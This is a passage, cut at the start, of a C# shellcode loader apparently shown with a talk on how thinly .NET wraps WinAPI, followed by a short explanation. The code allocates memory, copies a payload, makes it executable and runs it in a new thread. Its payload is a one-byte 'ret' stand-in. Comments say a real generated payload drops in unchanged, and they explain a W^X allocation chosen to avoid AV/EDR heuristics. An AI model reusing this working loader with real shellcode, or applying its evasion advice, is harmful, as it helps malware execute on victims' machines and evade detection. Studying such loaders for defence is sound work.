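                                      IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);
    [DllImport("kernel32.dll", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    static extern bool CloseHandle(IntPtr hObject);

    // Constructed stand-in for a generated payload: one `ret` (0xC3), so the new thread
    // starts at our buffer and returns immediately. A real payload would be the C#-formatted
    // byte[] a generator emits; none is included in this example.
    static readonly byte[] Payload = { 0xC3 };

    // Returns the WaitForSingleObject result (0 == WAIT_OBJECT_0: the payload thread finished).
    static uint Run(byte[] code)
    {
        var size = (UIntPtr)(uint)code.Length;

        // Allocate writable but not executable; copy first, then flip the protection (W^X).
        // A single RWX VirtualAlloc is the pattern most AV/EDR heuristics key on first.
        IntPtr mem = VirtualAlloc(IntPtr.Zero, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (mem == IntPtr.Zero)
            throw new Win32Exception(Marshal.GetLastWin32Error());
        try
        {
            Marshal.Copy(code, 0, mem, code.Length);
            if (!VirtualProtect(mem, size, PAGE_EXECUTE_READ, out uint oldProtect))
                throw new Win32Exception(Marshal.GetLastWin32Error());

            // The thread's start address is the buffer itself; no managed frame is involved.
            IntPtr thread = CreateThread(IntPtr.Zero, UIntPtr.Zero, mem, IntPtr.Zero, 0, out uint tid);
            if (thread == IntPtr.Zero)
                throw new Win32Exception(Marshal.GetLastWin32Error());
            Console.WriteLine("payload thread id " + tid);

            uint wait = WaitForSingleObject(thread, INFINITE);
            CloseHandle(thread);
            return wait;
        }
        finally
        {
            // Safe only because we waited for the thread: freeing under a running payload crashes.
            VirtualFree(mem, UIntPtr.Zero, MEM_RELEASE);
        }
    }

    static void Main()
    {
        uint result = Run(Payload);
        Console.WriteLine(result == 0 ? "payload returned cleanly" : "wait result 0x" + result.ToString("X"));
    }
}
```

With the one-byte stand-in the program prints the thread id and "payload returned cleanly"; swapping in a real generated byte array changes nothing in the mechanics, which is the point the talk was making about how little .NET stands between managed code and WinAPI.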